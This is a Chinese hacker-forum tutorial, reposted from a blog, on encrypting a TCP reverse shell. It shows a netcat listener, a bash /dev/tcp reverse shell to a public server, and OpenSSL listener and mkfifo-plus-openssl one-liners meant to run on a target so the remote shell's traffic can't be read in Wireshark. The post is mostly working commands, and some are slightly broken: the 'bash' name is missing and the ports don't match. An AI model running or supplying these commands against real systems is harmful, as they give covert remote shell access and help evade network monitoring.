游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日3年前

环境说明

公网服务器一台
kali （内网）

未标题-1.jpg

简单的测试

在公网服务器执行命令

 nc -lvvp 4444

kali中执行命令

   -i >& /dev/tcp/公网ip/5555 0>&1

启动Wireshark开启抓包，分析流量。

测试

我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。
QQ截图20190911130844.png
QQ截图20190911131150.png
我们可以清楚的看到，终端流量是通过明文传送。那么如何保证安全呢，这需要我们对明文流量加密处理。

openssl加密传输

第一步，在vps上生成SSL证书的公钥/私钥对

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

第二步，在VPS监听反弹shell

openssl s_server -quiet -key key.pem -cert cert.pem -port 4433

第三步，在目标上用openssl加密反弹shell的流量

mkfifo /tmp/s;/bin/  -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s

QQ截图20190911131150.png

流量已经被加密。

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/1385.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

加密基于TCP通信的shell

精选回复

环境说明

简单的测试

测试

openssl加密传输

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索